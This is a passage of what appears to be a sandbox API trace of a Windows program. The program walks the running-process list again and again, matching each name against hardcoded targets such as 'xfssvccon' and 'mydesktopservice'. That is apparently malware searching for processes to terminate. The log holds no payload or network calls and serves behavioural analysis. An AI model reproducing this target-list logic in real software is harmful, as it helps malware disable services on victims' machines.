lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.095] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35699e8 [0094.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x35699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0094.095] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0094.095] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="xfssvccon") returned 0x0 [0094.095] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0094.097] CloseHandle (hObject=0x350) returned 1 [0094.097] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0094.119] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.121] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569908 [0094.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3569908, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0094.121] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0094.121] StrStrIA (lpFirst="[System Process]", lpSrch="mydesktopservice") returned 0x0 [0094.121] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0094.122] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547978 [0094.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547978, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0094.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0094.122] StrStrIA (lpFirst="System", lpSrch="mydesktopservice") returned 0x0 [0094.122] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.125] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3569cd8 [0094.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3569cd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0094.125] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0094.125] StrStrIA (lpFirst="smss.exe", lpSrch="mydesktopservice") returned 0x0 [0094.125] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.126] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3569e58 [0094.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3569e58, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.126] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.126] StrStrIA (lpFirst="csrss.exe", lpSrch="mydesktopservice") returned 0x0 [0094.126] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.129] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569f18 [0094.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3569f18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0094.129] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0094.129] StrStrIA (lpFirst="wininit.exe", lpSrch="mydesktopservice") returned 0x0 [0094.129] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.130] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3569db0 [0094.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3569db0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.130] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.130] StrStrIA (lpFirst="csrss.exe", lpSrch="mydesktopservice") returned 0x0 [0094.130] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.131] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569c30 [0094.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3569c30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0094.131] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0094.132] StrStrIA (lpFirst="winlogon.exe", lpSrch="mydesktopservice") returned 0x0 [0094.132] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.133] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569e10 [0094.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3569e10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0094.133] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0094.133] StrStrIA (lpFirst="services.exe", lpSrch="mydesktopservice") returned 0x0 [0094.133] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.134] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3569e40 [0094.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3569e40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0094.134] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0094.134] StrStrIA (lpFirst="lsass.exe", lpSrch="mydesktopservice") returned 0x0 [0094.134] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.135] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569ca8 [0094.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569ca8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.136] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.136] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.137] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3569c48 [0094.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569c48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.137] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.137] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.137] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.138] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3569d38 [0094.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569d38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.139] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.139] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.140] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569c60 [0094.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569c60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.140] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.140] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.141] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547928 [0094.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547928, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0094.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0094.141] StrStrIA (lpFirst="dwm.exe", lpSrch="mydesktopservice") returned 0x0 [0094.141] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.142] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569d68 [0094.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569d68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.143] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.143] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.145] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569dc8 [0094.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569dc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.145] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.145] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.146] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569de0 [0094.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569de0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.146] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.146] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.147] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569e28 [0094.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569e28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.148] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.148] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.149] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569fa8 [0094.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569fa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.149] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.149] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.150] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a128 [0094.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356a128, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.150] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.150] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.152] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a0e0 [0094.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356a0e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.152] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.152] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.152] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.153] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a1d0 [0094.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356a1d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.153] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.153] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, 